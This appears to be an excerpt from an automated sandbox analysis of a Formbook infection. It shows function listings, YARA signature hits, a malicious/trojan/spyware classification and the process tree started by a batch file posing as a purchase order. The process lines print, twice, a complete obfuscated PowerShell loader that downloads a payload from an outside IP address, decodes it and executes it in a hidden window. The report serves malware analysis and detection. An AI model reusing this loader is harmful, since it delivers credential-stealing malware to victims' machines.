Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23303800 12_2_23303800
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23309870 12_2_23309870
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B870 12_2_2331B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E6868 12_2_232E6868
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BF872 12_2_233BF872
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233798B2 12_2_233798B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23316882 12_2_23316882
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B78F3 12_2_233B78F3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233028C0 12_2_233028C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330CF00 12_2_2330CF00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BFF63 12_2_233BFF63
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BEFBF 12_2_233BEFBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23306FE0 12_2_23306FE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B1FC6 12_2_233B1FC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233A0E6D 12_2_233A0E6D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23320E50 12_2_23320E50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23301EB2 12_2_23301EB2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B0EAD 12_2_233B0EAD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F2EE8 12_2_232F2EE8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B9ED2 12_2_233B9ED2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BFD27 12_2_233BFD27
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FAD00 12_2_232FAD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300D69 12_2_23300D69
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B7D4C 12_2_233B7D4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23312DB0 12_2_23312DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339FDF4 12_2_2339FDF4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23309DD0 12_2_23309DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330AC20 12_2_2330AC20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F0C12 12_2_232F0C12
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23303C60 12_2_23303C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B6C69 12_2_233B6C69
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BEC60 12_2_233BEC60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AEC4C 12_2_233AEC4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23399C98 12_2_23399C98
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331FCE0 12_2_2331FCE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CACEB 12_2_233CACEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23318CDF 12_2_23318CDF
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E6CBD0 14_2_06E6CBD0
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E6D0AF 14_2_06E6D0AF
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E6CD0F 14_2_06E6CD0F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E6C114 14_2_06E6C114
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AB0445 15_2_04AB0445
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B675C6 15_2_04B675C6
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6F5C9 15_2_04B6F5C9
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B7A526 15_2_04B7A526
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AB0680 15_2_04AB0680
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6F6F6 15_2_04B6F6F6
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AAC6E0 15_2_04AAC6E0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B236EC 15_2_04B236EC
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6A6C0 15_2_04B6A6C0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B4D62C 15_2_04B4D62C
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04ACC600 15_2_04ACC600
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AD4670 15_2_04AD4670
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B5D646 15_2_04B5D646
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AB2760 15_2_04AB2760
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04ABA760 15_2_04ABA760
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B66757 15_2_04B66757
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AA00A0 15_2_04AA00A0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B670F1 15_2_04B670F1
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04ABB0D0 15_2_04ABB0D0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B5E076 15_2_04B5E076
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04ACB1E0 15_2_04ACB1E0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AB51C0 15_2_04AB51C0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B4D130 15_2_04B4D130
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B7010E 15_2_04B7010E
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04A9F113 15_2_04A9F113
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AF717A 15_2_04AF717A
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04A9D2EC 15_2_04A9D2EC
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6124C 15_2_04B6124C
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AA1380 15_2_04AA1380
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6F330 15_2_04B6F330
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04ABE310 15_2_04ABE310
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B49C98 15_2_04B49C98
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04ACFCE0 15_2_04ACFCE0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B7ACEB 15_2_04B7ACEB
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AC8CDF 15_2_04AC8CDF
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04ABAC20 15_2_04ABAC20
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AA0C12 15_2_04AA0C12
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AB3C60 15_2_04AB3C60
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6EC60 15_2_04B6EC60
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B66C69 15_2_04B66C69
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B5EC4C 15_2_04B5EC4C
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AC2DB0 15_2_04AC2DB0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B4FDF4 15_2_04B4FDF4
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AB9DD0 15_2_04AB9DD0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6FD27 15_2_04B6FD27
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AAAD00 15_2_04AAAD00
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AB0D69 15_2_04AB0D69
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B67D4C 15_2_04B67D4C
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AB1EB2 15_2_04AB1EB2
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B60EAD 15_2_04B60EAD
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AA2EE8 15_2_04AA2EE8
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B69ED2 15_2_04B69ED2
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B50E6D 15_2_04B50E6D
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AD0E50 15_2_04AD0E50
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6EFBF 15_2_04B6EFBF
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AB6FE0 15_2_04AB6FE0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B61FC6 15_2_04B61FC6
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04ABCF00 15_2_04ABCF00
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6FF63 15_2_04B6FF63
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B298B2 15_2_04B298B2
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AC6882 15_2_04AC6882
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B678F3 15_2_04B678F3
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AB28C0 15_2_04AB28C0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B618DA 15_2_04B618DA
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B50835 15_2_04B50835
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AB3800 15_2_04AB3800
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04A96868 15_2_04A96868
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6F872 15_2_04B6F872
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AB9870 15_2_04AB9870
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04ACB870 15_2_04ACB870
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AAE9A0 15_2_04AAE9A0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6E9A6 15_2_04B6E9A6
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04ACFAA0 15_2_04ACFAA0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6FA89 15_2_04B6FA89
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6CA13 15_2_04B6CA13
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6EA5B 15_2_04B6EA5B
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B24BC0 15_2_04B24BC0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04B6FB2E 15_2_04B6FB2E
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AB0B10 15_2_04AB0B10
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AB3070 15_2_02AB3070
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AAC2E0 15_2_02AAC2E0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AAC2D6 15_2_02AAC2D6
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AAE260 15_2_02AAE260
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02ACB010 15_2_02ACB010
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AAE040 15_2_02AAE040
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AB47EC 15_2_02AB47EC
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AB47F0 15_2_02AB47F0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AAC429 15_2_02AAC429
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: String function: 04A9B910 appears 266 times
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: String function: 04AF7BE4 appears 88 times
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: String function: 04B2EF10 appears 105 times
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: String function: 04AE5050 appears 35 times
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: String function: 04B1E692 appears 84 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 23335050 appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2336E692 appears 84 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 23347BE4 appears 84 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2337EF10 appears 98 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 232EB910 appears 265 times
Yara signature match
Source: amsi32_2316.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3124, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2316, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.evad.winBAT@20/10@6/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Prezygomatic.Ben Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:304:WilStaging_02
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4pf1vrk.5pf.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_La-Tanerie04180240124.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3124
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2316
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_La-Tanerie04180240124.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
